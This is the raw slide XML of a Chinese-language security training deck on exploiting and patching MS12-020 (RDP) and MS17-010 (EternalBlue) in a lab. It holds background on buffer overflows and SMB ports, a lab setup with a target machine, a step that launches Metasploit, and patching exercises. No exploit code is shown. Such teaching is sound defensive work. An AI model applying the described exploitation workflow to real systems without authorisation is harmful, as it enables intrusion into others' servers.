              <a:buAutoNum type="arabicPeriod"/>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根据项目实施的步骤，完成MS12_020漏洞利用与安全加固操作,要求能独立设置测试环境，进行漏洞利用和漏洞加固。</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【项目训练】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>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922" y="1578165"/>
          <a:ext cx="5202555" cy="4533265"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1069975"/>
                <a:gridCol w="1699895"/>
                <a:gridCol w="448945"/>
                <a:gridCol w="991870"/>
                <a:gridCol w="991870"/>
              </a:tblGrid>
              <a:tr h="386715">
                <a:tc gridSpan="5">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项目名称：MS12_020漏洞利用与安全加固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671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远程桌面协议（RDP）、3389端口、拒绝服务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漏洞利用与加固测试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87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720">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2240280"/>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549275">
                <a:tc gridSpan="1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项目名称：MS12_020漏洞利用与安全加固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1010">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832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76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3784600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="742950" indent="-742950">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>假如不知道靶机的IP地址，如何利用namp进行扫描发现？请尝试测试。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="4000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" indent="-742950">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" sz="4000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" indent="-742950">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>尝试用安装补丁的方式为漏洞加固并测试验证效果，补丁名称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="仿宋" panose="02010609060101010101" charset="-122"/>
              </a:rPr>
              <a:t>WindowsServer2003-KB2621440-x86-CHS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="40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bldLvl="0" animBg="1"/>
      <p:bldP spid="8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415026" y="-203755"/>
              <a:ext cx="1066603"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01</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altLang="zh-CN" sz="40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40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6407150" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>3.1.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>MS17_010</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>漏洞利用与安全加固</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="2205990"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>、了解缓冲区溢出原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>、学会</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MS17_010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>漏洞利用与安全加固</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25273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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="3303905"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>缓冲区溢出攻击，可以导致程序运行失败、系统宕机、重新启动等后果，更为严重可以利用它执行非授权指令，甚至可以获取系统特权进行各种非法操作，因此在日常的系统维护中，做好缓冲区溢出漏洞的检测，关闭有可能存在风险的服务和端口十分重要。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25273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894599" y="1577975"/>
            <a:ext cx="10459085" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>缓冲区溢出（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>buffer overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>），是针对程序设计缺陷，向程序输入缓冲区写入使之溢出的内容，从而破坏程序运行、趁中断之际获取程序乃至系统的控制权，缓冲区溢出就好比给程序开了个后门，在当前网络与分布式系统安全中，远程网络攻击的绝大多数是利用缓冲区溢出攻击，利用缓冲区溢出漏洞实施的攻击就是缓冲区溢出攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Server Message Block</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>）协议主要是作为网络的通讯协议，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SMB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>是在会话层和表示层以及小部分应用层的协议，通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>协议可实现共享网络文件、打印等服务，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>协议使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>139</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>端口。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>端口可以在局域网中轻松访问各种共享文件夹或共享打印机，但也给网络带来一定的危险，攻击者可通过该端口进行攻击入侵。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>139 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>端口属于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>协议，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>NetBIOS File and Print Sharing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>进入的连接试图获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>NetBIOS/SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>服务。这个协议被用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>“文件和打印机共享”和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SAMBA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>MS17_010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>漏洞俗称“永恒之蓝”，是缓冲区溢出攻击的一种，利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>系统的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>漏洞可以获取系统最高权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>端口入侵，获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>进行提权</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>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animBg="1"/>
      <p:bldP spid="8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lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网络管理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>员小王请来专业人员对公司的服务器系统（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Windows Server 2008</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）进行漏洞渗透测试，结果发现服务器系统开启了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>端口，并有异常的数据包，专业人员判断系统存在一定的风险，如果攻击者利用永恒之蓝（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Eternal Blue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）漏洞，向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>端口发送报文攻击，获取系统管理员权限，以此来控制公司的服务器，那么后果不可设想，因此，必须对这个漏洞进行测试和加固，以保证系统的安全性。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0">
              <a:latin typeface="+mn-ea"/>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7583170" cy="1420495"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="854710"/>
                <a:gridCol w="1879138"/>
                <a:gridCol w="2951307"/>
                <a:gridCol w="189801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Win2003R2-1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dirty="0" smtClean="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>192.138.66.30</a:t>
                      </a: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dirty="0" err="1">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>靶机</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="24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3" name="文本框 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="859155" y="4770120"/>
            <a:ext cx="7832725" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>靶机开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>端口，网络互连互通</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="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413164"/>
            <a:ext cx="10515600" cy="4891116"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Kali Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>终端界面中输入“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>命令，打开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>框架，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3-1-9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068130" y="442945"/>
            <a:ext cx="4493538" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>步骤二，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MS12-020</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="图片 1" descr="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00168" y="2324014"/>
            <a:ext cx="6502516" cy="333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096345" y="5586153"/>
            <a:ext cx="4930645" cy="507831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1602105" indent="266700" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" kern="100" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="100" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3-1-9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" kern="100" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>打开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="100" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" kern="100" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>框架</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" kern="100" dirty="0">
              <a:latin typeface="Calibri" panose="020F050202020403020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5955" y="435610"/>
            <a:ext cx="10515600" cy="5956300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>步骤二 MS12-020漏洞利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> 1.在Kali Linux终端界面中输入“msfconsole”命令，打开Metasploit框架，如图3-1-1所示</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 -2147482624" descr="图3-1-1打开Metasploit框架"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1568450" y="2036445"/>
            <a:ext cx="7269480" cy="4095115"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">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56235"/>
            <a:ext cx="10515600" cy="5821045"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
